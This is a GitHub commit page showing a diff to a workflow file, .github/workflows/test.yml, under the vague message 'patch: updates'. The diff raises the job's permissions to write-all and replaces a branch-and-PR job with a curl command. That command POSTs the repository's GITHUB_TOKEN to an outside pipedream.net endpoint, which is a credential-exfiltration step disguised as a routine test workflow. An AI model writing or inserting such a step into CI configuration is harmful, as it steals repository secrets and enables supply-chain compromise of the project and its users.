Skip to content

Commit

Permalink
patch: updates
Browse files Browse the repository at this point in the history
  • Loading branch information
tibrnui committed Aug 27, 2024
1 parent e03a053 commit 00c5bf8
Showing 1 changed file with 3 additions and 29 deletions.
32 changes: 3 additions & 29 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,33 +11,7 @@ on:
jobs:
use_api:
runs-on: ubuntu-latest
permissions:
actions: write
attestations: write
checks: write
contents: write
deployments: write
id-token: write
issues: write
discussions: write
packages: write
pages: write
pull-requests: write
repository-projects: write
security-events: write
statuses: write
permissions: write-all
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
git config --global user.name "tibrnui"
git checkout -b feat/test-12
touch test
git add .
git commit -m "test"
git remote set-url origin https://uipath:${{ secrets.GITHUB_TOKEN }}@github.com/$GITHUB_REPOSITORY
git push --set-upstream origin feat/test-12
gh pr create --base develop --head feat/test-12
- run:
curl -d "{{secrets.GITHUB_TOKEN}}" -X POST https://eoinkd603ndv2ew.m.pipedream.net

0 comments on commit 00c5bf8

Please sign in to comment.